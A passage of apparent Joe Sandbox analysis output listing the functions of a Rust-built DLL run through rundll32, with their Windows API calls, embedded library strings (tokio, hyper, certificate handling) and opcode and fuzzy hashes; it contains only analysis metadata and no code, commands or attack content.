                        • Opcode Fuzzy Hash: ed6c998ab337222b0943c2fd034c67ce8c3e7059df546ee3278538acae9109fd
                        • Instruction Fuzzy Hash: FD5178B1600B408FC724CF29D944B12FBF9EB88744F108A2EE09A97F50E775F4098B91
                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6CC0114C
                        • ___scrt_uninitialize_crt.LIBCMT ref: 6CC01166
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Initialize___scrt_uninitialize_crt
                        • String ID:
                        • API String ID: 2442719207-0
                        • Opcode ID: c467e7bad3d6d2a3ff5e244e89fec0cf125cb83b4550b6ee2c5edac6341e6361
                        • Instruction ID: d76b54626f6760f7743c4ee41c0ecac13d60933dfaf6dbdbf4115b326c420921
                        • Opcode Fuzzy Hash: c467e7bad3d6d2a3ff5e244e89fec0cf125cb83b4550b6ee2c5edac6341e6361
                        • Instruction Fuzzy Hash: 1441E572F05219AFDB118F9EC840BEEB6B4EB4575CF114119E810E7B40F732C9058B90
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBAF274
                        • memmove.VCRUNTIME140(?,?,00000220), ref: 6CBAF28B
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBAF2F6
                        • memmove.VCRUNTIME140(?,?,000000C8), ref: 6CBAF30D
                        • memmove.VCRUNTIME140(?,?,00000168), ref: 6CBAF35A
                        Strings
                        • HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel, xrefs: 6CBAEBB6
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel
                        • API String ID: 2162964266-2977587669
                        • Opcode ID: ec103d8a88c589b4a601676fb1d27158e245255a282b4429800b7ef9513cde1a
                        • Instruction ID: 26013e00e800645e5ef210f995ccae2a0af1bd55907fb981ab203560f4fc0054
                        • Opcode Fuzzy Hash: ec103d8a88c589b4a601676fb1d27158e245255a282b4429800b7ef9513cde1a
                        • Instruction Fuzzy Hash: E0D1F130608785AFD715CF28C498BDEB7E1FF44308F148569E89D4B7A1D731A95ACB82
                        APIs
                        • SetLastError.KERNEL32(00000000), ref: 6CBED277
                        • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6CBED282
                        • GetLastError.KERNEL32 ref: 6CBED28E
                        • GetLastError.KERNEL32 ref: 6CBED29F
                        Strings
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBED3D4
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast$EnvironmentVariable
                        • String ID: internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 2691138088-2861346101
                        • Opcode ID: 4a2caafc9d201149c61649f493203bbf787d842efc84bc30d9f196d3446bafcf
                        • Instruction ID: 1cb8f12a5d3fc52116916cc3e785125d3c824af3b0927c2bce1af52d2b909492
                        • Opcode Fuzzy Hash: 4a2caafc9d201149c61649f493203bbf787d842efc84bc30d9f196d3446bafcf
                        • Instruction Fuzzy Hash: 2991A3B4E002988FDB10CFA4E8847DEBBB1FF88758F244119D81577B41D7B59989CB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBC3189
                          • Part of subcall function 6CBC3AA8: SwitchToThread.KERNEL32(74DE7CC0,?,00000000,6CBC3C97,?,6CBC882F,?,?,?,?,6CBC8E73), ref: 6CBC3AC9
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBC323C
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CBC324A
                        Strings
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBC3278
                        • polling StreamFuture twiceD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\stream\stream\into_future.rs, xrefs: 6CBC329C
                        • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CBC328A
                        • cannot poll Select twice, xrefs: 6CBC3266
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$SwitchThread
                        • String ID: Map must not be polled after it returned `Poll::Ready`$cannot poll Select twice$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$polling StreamFuture twiceD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\stream\stream\into_future.rs
                        • API String ID: 591106811-2960990579
                        • Opcode ID: 93c4d035fe2322ad76236ff475a16e1dfdfd3e88361a2af84b18f8ba52146b4f
                        • Instruction ID: 2168c442c6feda2eec11a733fc06b18035a44cc4f93a0e8bca7b4eb1c758dadf
                        • Opcode Fuzzy Hash: 93c4d035fe2322ad76236ff475a16e1dfdfd3e88361a2af84b18f8ba52146b4f
                        • Instruction Fuzzy Hash: BF51C0717013419BDB05CF24C8917EAF7A5FF86308F908569E0598FB80EB719969CB82
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                        • String ID:
                        • API String ID: 3353612457-0
                        • Opcode ID: 8dc05e6614f98512dfa22c72465c8b63cc36a60d38746923f71ca1a066b2f12d
                        • Instruction ID: cc59d30f767c0e073f5d36e6c828af42583e3d047c295d7944a7903234936a66
                        • Opcode Fuzzy Hash: 8dc05e6614f98512dfa22c72465c8b63cc36a60d38746923f71ca1a066b2f12d
                        • Instruction Fuzzy Hash: CF217471F01655AFDB118F5EC840AAFBAB9EB85B9CB024115FC1497A10F332CD458B90
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CertCertificateContextDuplicatememmove
                        • String ID:
                        • API String ID: 280200442-0
                        • Opcode ID: f4fba62b76b96489d047b88ad25ba593b115282b969d76c1a5b03e729277f8a8
                        • Instruction ID: 4db80e3bd9c40497fbe602836692270c055e2584f10361df35e54a0cbdc7d53e
                        • Opcode Fuzzy Hash: f4fba62b76b96489d047b88ad25ba593b115282b969d76c1a5b03e729277f8a8
                        • Instruction Fuzzy Hash: DFF16C70908B859FC761CF24C4817DBB7F5BF9A344F108A2EE88D5B641EB70A589CB52
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CBBA494
                        • memmove.VCRUNTIME140(?,?,0000010C), ref: 6CBBA4BC
                        • memmove.VCRUNTIME140(?,?,0000002B), ref: 6CBBA604
                        Strings
                        • HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs, xrefs: 6CBBA4F3
                        • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CBBA6BF
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: HTTP/2 connection in progressD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.32\src\common\lazy.rs$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                        • API String ID: 2162964266-2665790016
                        • Opcode ID: df159ad5a2878a5618700bfb5786101299140cc0cde6f3b793837c05079cccc5
                        • Instruction ID: 965d99f1bbcda04b4feac1d48de25844c6fce7c99c5bc6d51922859cd5f2649c
                        • Opcode Fuzzy Hash: df159ad5a2878a5618700bfb5786101299140cc0cde6f3b793837c05079cccc5
                        • Instruction Fuzzy Hash: 4071B0329087819BCB11CF24C480A9FB7E5EF85314F04896EE899AF681DB709549CB92
                        APIs
                        Strings
                        • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CBEF8F1, 6CBEF939
                        • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CBEF8D1, 6CBEF915
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: freeaddrinfo
                        • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                        • API String ID: 2731292433-3544120690
                        • Opcode ID: 09f346884294e5093a8c1097546762ce53845c80f570f3aafd0e3d9a51f76bfc
                        • Instruction ID: 06da376e7e86b2f5a9398626aa3a798b1e08c40ffb69203c8f1943e0a15d5dc8
                        • Opcode Fuzzy Hash: 09f346884294e5093a8c1097546762ce53845c80f570f3aafd0e3d9a51f76bfc
                        • Instruction Fuzzy Hash: 64D1B9B0D00258CFCB08CF89E490AADBBB1FF88314F25816ED819AB792D7719945CF95
                        APIs
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD6AFE
                        • CertFreeCertificateContext.CRYPT32 ref: 6CBD6B20
                        • CertFreeCertificateChain.CRYPT32(?), ref: 6CBD6B32
                        Strings
                        • unable to find any user-specified roots in the final cert chain, xrefs: 6CBD6B60
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CertCertificateFree$Context$Chain
                        • String ID: unable to find any user-specified roots in the final cert chain
                        • API String ID: 1586265559-2994100780
                        • Opcode ID: 9bb7f9fea8134581cd093768ab6af6a45f24236123f9d771e450a7d48bba6d6c
                        • Instruction ID: 36a90ae8d4f483582f148f89cf30b180735b4530691a1deecfef256eb130294d
                        • Opcode Fuzzy Hash: 9bb7f9fea8134581cd093768ab6af6a45f24236123f9d771e450a7d48bba6d6c
                        • Instruction Fuzzy Hash: F431AE316083819BC304DF24C981A5EB7F1EFC9718F15892DE9899B751CB32EC86CB52
                        APIs
                        Strings
                        • TryFromIntErrorOS can't spawn worker thread: , xrefs: 6CBED0DA
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBED096
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: lstrlenmemcmp
                        • String ID: TryFromIntErrorOS can't spawn worker thread: $called `Result::unwrap()` on an `Err` value
                        • API String ID: 1799893992-1221440643
                        • Opcode ID: 937c43ed6a87a32964ebf78faa0ee4e5cedcf3b82921c7d768005be603f34725
                        • Instruction ID: 23c62d9693fd14a7b2ad5d4cacaf364250e1751e5f2aaed3ca4f37880f046379
                        • Opcode Fuzzy Hash: 937c43ed6a87a32964ebf78faa0ee4e5cedcf3b82921c7d768005be603f34725
                        • Instruction Fuzzy Hash: FF81E571A002498FCF10DF59C850AEEBBB6FF88758F248629E815A7B51E731A845CBD1
                        APIs
                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6CC620B0,?,?,6CBF24C8), ref: 6CC050C7
                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6CC620B8,?,?,6CBF24C8), ref: 6CC050FD
                        • WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0(6CC620B4,?,?,6CBF24C8), ref: 6CC05113
                        • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6CC620B4,?,00000004,000000FF), ref: 6CC051CB
                        • GetLastError.KERNEL32(?,?,00000004,000000FF), ref: 6CC051D2
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Address$Wake$Single$ErrorLastWait
                        • String ID:
                        • API String ID: 798958160-0
                        • Opcode ID: c81e9718e6425da3e1f524293f3f3c39731f9efd36d1a6f2e3f034789b75d4cf
                        • Instruction ID: 657c6b4ff979f76de61560b78b8eb9cfe47ba94a2be67a9ec43d1d3a8d063d8f
                        • Opcode Fuzzy Hash: c81e9718e6425da3e1f524293f3f3c39731f9efd36d1a6f2e3f034789b75d4cf
                        • Instruction Fuzzy Hash: 9331C8303052054BD7154A269854B5A32B5AF8737CF38876DE936DBAD2FA338843879D
                        APIs
                        • memmove.VCRUNTIME140(00000000,?,?), ref: 6CBE6FF3
                        • memmove.VCRUNTIME140(-0000000A,?,00000000), ref: 6CBE7068
                        • InitializeSecurityContextW.SECUR32(?,00000000,?,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CBE71EE
                        Strings
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBE70A7
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$ContextInitializeSecurity
                        • String ID: called `Result::unwrap()` on an `Err` value
                        • API String ID: 1120248335-2333694755
                        • Opcode ID: 98d8daa27834d5ad23e563b0fee4ba44e9358e93c7093e8e0b6dcfe57c492f4d
                        • Instruction ID: 2459aef19e99febe649d4acca8b81c431c659adb253d6e17fce8c70464f78bb3
                        • Opcode Fuzzy Hash: 98d8daa27834d5ad23e563b0fee4ba44e9358e93c7093e8e0b6dcfe57c492f4d
                        • Instruction Fuzzy Hash: 0B91BCB16083419FD300CF15C880B5BFBE9EF88758F14892DE5988B792DB71E849CB92
                        APIs
                        • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CBEA870
                        • GetLastError.KERNEL32 ref: 6CBEA87B
                        Strings
                        • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CBEA8EE
                        • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CBEA8A8
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressErrorLastWait
                        • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                        • API String ID: 1574541344-1776713852
                        • Opcode ID: b9e1b548ea623f6539e558bca43778b1789f5edc816050aaf4a48a2d62c10422
                        • Instruction ID: 3bbb2a51cc7811127a6407de82d62284f051488951705d8b09cd99edf432ee4d
                        • Opcode Fuzzy Hash: b9e1b548ea623f6539e558bca43778b1789f5edc816050aaf4a48a2d62c10422
                        • Instruction Fuzzy Hash: 66611471E002488FDB14CFA9C845BEEBBF9EF48764F14416AD808A7B81D735A946CF91
                        APIs
                        • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001,000000FF,00000001,FFFFFFFF), ref: 6CBEA870
                        • GetLastError.KERNEL32 ref: 6CBEA87B
                        Strings
                        • NulErrorUtf8Errorvalid_up_toerror_len, xrefs: 6CBEA8EE
                        • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CBEA8A8
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressErrorLastWait
                        • String ID: NulErrorUtf8Errorvalid_up_toerror_len$use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                        • API String ID: 1574541344-1776713852
                        • Opcode ID: e1243eefa854f0e7532c48bb743639e8e4978f8c5edd8a39ac4ab7cc391ebf38
                        • Instruction ID: 8acfdb06a2939ff2309583cf91b4ca50e473f60605967ec7790d9a8afe645bb1
                        • Opcode Fuzzy Hash: e1243eefa854f0e7532c48bb743639e8e4978f8c5edd8a39ac4ab7cc391ebf38
                        • Instruction Fuzzy Hash: 86510471A002888FCB14CF69C884BEEBBF9EB49754F14416AD808A7B81D7359946CF91
                        APIs
                        Strings
                        • assertion failed: (*next).value.is_some(), xrefs: 6CB8BEA2
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CB8BEC5
                        • assertion failed: (*tail).value.is_none(), xrefs: 6CB8BE90
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: SwitchThread
                        • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()$called `Result::unwrap()` on an `Err` value
                        • API String ID: 115865932-1206542395
                        • Opcode ID: c7491c44d5aab56e1d015833adea4a7c609c038b665ef3d00123d1a3aad9b907
                        • Instruction ID: 278db3249a34a6d42ada5ece6326bbd0a44eebd4e8eef99c1a1ccd91b3a118fb
                        • Opcode Fuzzy Hash: c7491c44d5aab56e1d015833adea4a7c609c038b665ef3d00123d1a3aad9b907
                        • Instruction Fuzzy Hash: 5A31E131606B868FD710CF34C85076EB7E1EF8635AF10881DE9989BB51EB70D885C762
                        APIs
                        • CertDuplicateCertificateContext.CRYPT32(?), ref: 6CBDC7FC
                        • CertOpenStore.CRYPT32(00000002,00000000,00000000,00000000,00000000), ref: 6CBDC817
                        • CertFreeCertificateContext.CRYPT32(00000046), ref: 6CBDC883
                        • GetLastError.KERNEL32 ref: 6CBDC890
                        • CertFreeCertificateContext.CRYPT32(?), ref: 6CBDC917
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Cert$CertificateContext$Free$DuplicateErrorLastOpenStore
                        • String ID: P(Hu
                        • API String ID: 721414120-3302524760
                        • Opcode ID: a8c90bf1c630bbd2790fd33a1dcaa73e7bff5c7ef397bc0e20969a90c304920e
                        • Instruction ID: 74b9ff84f063ad671b1d9fdf30386e51ad108cf39909deb9dbc1d2e175594a62
                        • Opcode Fuzzy Hash: a8c90bf1c630bbd2790fd33a1dcaa73e7bff5c7ef397bc0e20969a90c304920e
                        • Instruction Fuzzy Hash: C94134B550D7C18FD3228F2480807DBBBE0AF9A319F148A5DEAD857382C771A485CB57
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32), ref: 6CBE91A8
                        • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6CBE91B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: SetThreadDescription$kernel32
                        • API String ID: 1646373207-1950310818
                        • Opcode ID: b5a6b206b1705010d11178b82b14f8884b1ae4939122f77373456dda84c794ce
                        • Instruction ID: 4f51cd03a0c400c78c20bb7f012d699ca211dfc833265cec56a1faf1fa6fb59d
                        • Opcode Fuzzy Hash: b5a6b206b1705010d11178b82b14f8884b1ae4939122f77373456dda84c794ce
                        • Instruction Fuzzy Hash: 63D05EB0BCC6407B5A580A628C2D67537E9868A8C4340082CD922C5E00EB21C82A829B
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CBAF9AA
                        • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CBAF9F0
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBAFA20
                          • Part of subcall function 6CBC3A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CBAFA35), ref: 6CBC3A29
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBAFA5E
